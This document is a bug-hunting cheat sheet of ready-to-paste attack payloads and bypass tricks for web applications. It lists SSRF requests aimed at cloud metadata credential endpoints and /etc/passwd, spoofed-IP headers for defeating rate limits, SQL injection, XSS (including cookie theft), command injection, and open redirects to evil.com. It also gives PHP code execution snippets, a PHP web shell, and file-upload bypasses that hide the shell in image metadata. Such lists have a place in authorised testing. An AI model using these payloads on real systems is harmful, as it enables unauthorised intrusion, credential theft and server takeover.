Websites
___________
https://wordlists.assetnote.io/ => for wordlists
https://sploitus.com/ => for exploit
https://hunter.io/ => find email website
https://xsshunter.com/ => blind xss website
https://bgp.he.net/ asn search
https://csrf.infos3c.net/ => csrf poc generator
-------------------------------------


Search Engines:
________________
https://google.com/
https://github.com/
https://duckduckgo.com/
https://search.censys.io/
https://binaryedge.io/
https://leakix.net/
https://app.netlas.io/
https://searchcode.com/
https://urlscan.io/
https://fullhunt.io/
https://matrixm0x.github.io/shodan/
https://matrixm0x.github.io/github/
https://matrixm0x.github.io/google/
-------------------------


_______________

IDOR
______
* Bypass with unique code:
- add %20 in end of number or id etc...
_______________________________________
* Bypass with Change the request methode:
- GET, POST, PUT, DELETE, PATCH
_______________________________________
* Bypass with make parameter as list:
- user_id= --> user_id[]=
_______________________________________
* Bypass with using double paramiters with different value:
- user_id=123&user_id=456
_______________________________________
* Add parameter if dont have:
- /account --> /account?id=123
_______________________________________
* Add Extention for:
- /user_data/1234 -> 401 Unauthorized
- /user_data/1234.json -> 200 OK
_______________________________________
* Add * at the end:
- /api/users/<user_id>/ -> /api/users/*
_______________________________________


CSRF
_______
* Bypass with change request:
- from POST to GET or GET to POST
_______________________________________
* Bypass with remove csrf token from the request
_______________________________________
* Bypass with change something on csrf token type random value
_______________________________________
* Bypass with create second account get the correct csrf token
then paste it in the first account csrf token
_______________________________________
* Bypass with create second account get the correct csrfKey
then paste it in the first account csrfKey
_______________________________________
* Bypass with if csrf token duplicated on the request
make it equal
_______________________________________
* Bypass with if it detect referrer header
then delete a referrer on the request and add this to poc:
<head>
   <meta name="referrer" content="never">
</head>
_______________________________________


SSRF
_______
Payloads:
__________
https://127.0.0.1/
https://localhost/
or use something for pingback
_______________________________________
* Use https://192.168.0.1:8080 [ Url Rating ]
- in intruder on burp add 1 to 255
and do fuzzing on it
_______________________________________
Bypass:
_________
http://127.1/%61dmin/
http://127.0.1/
http://127/
file:///etc/passwd
file://\/\/etc/passwd
netdoc:///etc/passwd
http://127.0.0.1:22
http://127.0.0.1:80
http://127.0.0.1:443
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/metadata/v1/maintenance
http://169.254.169.254/metadata/v1/ 
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
______________________________________________


NoRateLimit
_______________
Bypass:
_________
add Common Characters in end of mail --> test@gmail.com%00
%0d , %2e , %09 , %20 , %00 , %0d%0a , %0C , %0
____________
Or adding space after email
____________
X-Forwarded-By: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
____________
Or find ip of the website --> host target.com
then change 127.0.0.1 to the target ip
____________
Or use Double X-Forwarded-For:
____________


Path Traversal & Lfi
_____________________
All Payload & Bypassin lfi.txt in wordlist


SQL
_______
Payloads:
__________
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z
0' AND (SELECT B871 FROM (SELECT (SLEEP (5)) ) uZxz--
0' AND 5922=(SELECT 5922 FROM PG_SLEEP(5)) AND 'Ezil'='Ezil
0';SELECT PG_SLEEP(5)--
‘
_______________________________________
* Bypass with %2b:
- email=test'+ --> email=test'%2b
_______________________________________



Html Injection:
_________________
<h1>aaaa</h1>

<u>aaa</u>

<h1><a href="https://evil.com">click</a></h1>
	
<img src="https://eu-images.contentstack.com/v3/assets/bltf2510975ef72f37f/bltfd0f06d903033fb4/61f55dd8935106184ab7adc5/4760d15c-3810-43ef-945b-eb1d519c07cc.jpg">
--------------------------------------------


XSS:
_______
"><svg onload=alert%26%230000000040"1")>

${alert(2222)}

xss%22%20tabindex%3d1%20autofocus%20onfocus%3d%22alert()

"><img src=x onerror=prompt(document.cookie);>

<input value="", onpointerrawupdate="a=confirm, a(1)">

"><details%00open%00ontoggle=alert()>
%22onload=%22prompt(1)

<scr<script><ipt>alert(1)</scr</script><ipt>

JavaScript:print()

<script>alert(1)</script>

javascript:alert(1)

JavaScript:confirm()//

JavaScript:print()

javascript:prompt(document.domain())

"><img/src/onerror=alert(1)>

"><img src=x onmouseover=confirm (1)>

><svg onload%3d%26%23x00000000061;%26%23x0000000006c%26%23x0000000065%26%23x0000000072%26%23x00000000074(1%26%230000000000000041; <%2fscript%20

test+<script>alert(0)</script>@gmail.com
test@"<script>alert(0)</script>"gmail.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
-------------------------------------------


SSTI:
____________________
"<%= 7 * 7 %>"@gmail.com
test+(${{7*7}})@gmail.com
--------------------------


OS:
____
%26+whoami+%23
%26+sleep(10)+%23
%26+nslookup+site+%23
----------------------


Open-Redirect:
_______________
* Bypass with using double paramiters with different value:
- url=attacker.com&url=attacker.com
_______________________________________
////evil.com/%E3%80%82com
---------------------------


CRLF:
_______
%0d%0aSet-Cookie:MyHeader=kre
%0d%0aKre:Tre=kre
-------------------------------------------


RCE:
______
<?php phpinfo();?>
<?php system('cat /etc/passwd'); ?>
-------------------------------------------


FILE UPLOAD:
______________
Bypass:
________
<?php system($_GET['cmd']); ?>
file.pHp 
file.php.jpg
file.pHP5, 
file.PhAr
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
flile.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg

exiftool -Comment="<?php system($_GET['cmd']); ?>" pic.jpg
mv pic.jpg pic.php.jpg
